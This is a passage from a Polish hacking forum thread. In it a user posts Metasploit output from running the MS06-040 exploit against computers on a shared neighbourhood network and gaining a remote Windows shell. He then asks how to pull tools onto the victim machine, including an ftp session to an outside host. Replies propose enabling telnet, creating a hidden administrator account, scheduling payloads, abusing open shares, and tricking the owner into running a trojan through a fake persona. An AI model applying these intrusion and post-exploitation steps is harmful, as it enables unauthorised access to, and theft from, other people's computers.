Strona 1 z 2 12 OstatniOstatni
Pokaż wyniki 1 do 10 z 16

Temat: metasploit, download problem ;[

  1. #1
    Zarejestrowany
    Jun 2006
    Postów
    112

    Domyślnie metasploit, download problem ;[

    wszystko działa, wszystko cacy, natomiast po wejsciu do w sumie gołego systemu problem jest następujący, nie ma nic, co umożliwiłoby łatwe proste i przyjemne ściągnięcie nań potrzebnych narzędzi.

    Kod:
    msf netapi_ms06_040(win32_bind) > set RHOST 10.0.10.170
    RHOST -> 10.0.10.170
    msf netapi_ms06_040(win32_bind) > exploit[*] Starting Bind Handler.[*] Detected a Windows XP target[*] This will not work on SP2![*] Sending request...[*] The server rejected it, trying again...[*] This system may be patched or running Windows XP SP1 or SP2[*] RPC server responded with:[*] RESPONSE => response[*] STUB DATA = \x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x7D\x00\x00\x00\x4B\x08\x00\x00[*] Exiting Bind Handler.
    msf netapi_ms06_040(win32_bind) > unset RHOST
    msf netapi_ms06_040(win32_bind) > set RHOST 10.0.8.63
    RHOST -> 10.0.8.63
    msf netapi_ms06_040(win32_bind) > exploit[*] Starting Bind Handler.[*] Detected a Windows XP target[*] This will not work on SP2![*] Sending request...[*] The server rejected it, trying again...[*] Got connection from 10.0.9.4:54810 <-> 10.0.8.63:4444
    
    Microsoft Windows XP [Wersja 5.1.2600]
    (C) Copyright 1985-2001 Microsoft Corp.
    
    C:\WINDOWS\system32>
    no i jesteśmy... ale dalej...
    spróbujmy sciągnąc coś z ftp...

    Kod:
    Microsoft Windows XP [Wersja 5.1.2600]
    (C) Copyright 1985-2001 Microsoft Corp.
    
    C:\WINDOWS\system32>ftp
    ftp
    open agregator.w.interia.pl
    Uytkownik (agregator.w.interia.pl:(none)): agregator
    m3f1st0f3l3s
    dir
    
    quit
    chujwiecojeszcze ;-)
    wynik jest taki sam - brak odpowiedzi od terminala, co mnie bardzo martwi... ;-)

    dopiero po ctrl+c terminal reaguje:
    Kod:
    Caught interrupt, exit connection? [y/n] Dropping back to the console...
    
    Caught interrupt, exit connection? [y/n] y[*] Exiting Bind Handler.
    msf netapi_ms06_040(win32_bind) >
    i tu leży właśnie istota problemu: jak ściągnąc coś ze zdalnego komputera, używając konsoli wygenerowanej przez metasploit'y?

  2. #2
    Zarejestrowany
    Jun 2006
    Skąd
    Brok
    Postów
    42

    Domyślnie

    Nie znam się na tym, ale może ten komp albo router przez który się komunikuje ze światem ma we firewall'u zablokowane porty ftp :]

    Próbowałeś może przez telnet?

  3. #3
    Zarejestrowany
    Jun 2006
    Postów
    112

    Domyślnie

    1. próbowałem, nie ma tam firewalla (gdyby był, to nie wiem, czy bym się przebił tak łatwo ;-) ), i jest to zwykły box domowy, nie router.
    2. telnetem próbowałem, nie chodzi tutaj o to. kwestią jest to, że "środowisko" metasploita nie uruchamia (raczej nie wyświetla) "poprawnie" programów typu edit, ftp, telnet, także nie w tym sęk, o czym mówisz, ale wszelkie uwagi, koncepcje, mile widziane.
    3. jest kilka innych możliwości przejećia w pełni maszyny w takim przypadku, jak opisuje, tj. przez użycie odpowiednio zbudowanych komend echo:
    echo "komenda" >> do.pliku.txt
    i później użycie tego, jako wsadowych parametrów dla aplikacji.
    np. ftp.exe -slik.txt
    ale ten sposób też nie działa...
    inne sposoby to zbudowanie pliku.reg, ale nie wiem, czy aby nie będzie wymagane kliknięcie "Dodaj" od użytkownika siedzącego przy monitorze (co demaskuje nas na starcie ;-) (chociaż generalnie jest możliwość z konsoli wydania polecenia z parametrem /y jako potwierdzenia... :S nie wiem...
    dalszy sposób, to budowa pliku.bat ale też brak mi tu weny twórczej... także raz jeszcze: podpowiedzi, sugestje, pomysły jak najbardziej mile widziane ;-)

  4. #4
    Zarejestrowany
    Jun 2006
    Skąd
    Brok
    Postów
    42

    Domyślnie

    Po IP domyślam się że jesteście w tej samej sieci osiedlowej, no chyba że podałeś nam inne.

    A możesz zrobić coś takiego żeby przesłać jakiś plik *.bat, *.reg czy cokolwiek co odblokuje telnet a następnie będziesz mógł się zalogować przez niego na konto gościa, albo jakieś inne.

    Powiedzmy że jesteś w stanie przesłać tam dowolny plik, niech więc uruchomi się automatycznie o danej porze i wykona to co napisałem wyrzej, albo jeszcze inaczej, ta osoba najprawdopodbniej korzysta z konta administratora, więc mógłbyś założyć tam swoje własne konto.

  5. #5
    Avatar blackicenavarro
    blackicenavarro jest offline SIŁA TKWI W BITACH
    Zarejestrowany
    Jun 2006
    Skąd
    gory czasem doliny
    Postów
    156

    Domyślnie

    zalezy co chcesz zrobic z tamtym kompem. jezeli chcesz cos wyssac sa inne narzedzia ktore to zrobia. wg mnie nie liczy sie sposob ale wynik.
    BlackIceNavarro

  6. #6
    Zarejestrowany
    Jun 2006
    Postów
    112

    Domyślnie

    przykłady panowie... konkretne przykłady...? ;-)

  7. #7
    Avatar blackicenavarro
    blackicenavarro jest offline SIŁA TKWI W BITACH
    Zarejestrowany
    Jun 2006
    Skąd
    gory czasem doliny
    Postów
    156

    Domyślnie

    hmm, dalej nie napisales co chcesz zrobic z tamta maszyna. przyjmuje ze chcesz cos wyssac. zatem analizujac to co pisales koles jest amatorem-posiada zatem najweikszego backdoora w historii polskiego internetu a mianowice slawetne dziurawe GG. Mysle ze to jets klucz do rozwiazania calego problemu. jest multum trojanow wykorzystujacych jego dziury. banał. oczywiscie wymaga rekacji ofiary-no ale skoro nawet nie ma firewalla co za problem wyslac mu cos :P - troche socjotechniki i problem rozwiazany np. czesc nazywam sie monika, wysle ci album moich zdjec
    BlackIceNavarro

  8. #8
    Zarejestrowany
    Jun 2006
    Postów
    112

    Domyślnie

    nie przejdzie. potrzebuje coś innego ;[
    a wiecie jak można stworzyć pli, który otworzy z konsoli serwer telnet/udostępni jakiś katalog? tyle, że z konsoli mi chodzi jak to zrobić (w win naturalnie ;-) )

  9. #9
    Zarejestrowany
    Jun 2006
    Skąd
    Brok
    Postów
    42

    Domyślnie

    Ty a właśnie, co z katalogami udostępnionymi? Przeważnie jakiś katalog jest udostępniony, czasami nawet nie jest zabezpieczony hasłem, sprawdź w końcu jesteście w tej samej sieci.

  10. #10
    Zarejestrowany
    Jun 2006
    Postów
    112

    Domyślnie

    litości... ;>
    zgadnij, czy sprawdziłem przed sprawdzaniem metasploitem, inne możliwości, które przyszły mi do głowy ;-)

    powiedz lepiej, jak udostępnić katalog używając konsoli ;>

Strona 1 z 2 12 OstatniOstatni

Zasady Postowania

  • Nie możesz zakładać nowych tematów
  • Nie możesz pisać wiadomości
  • Nie możesz dodawać załączników
  • Nie możesz edytować swoich postów
  •  
Subskrybuj

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52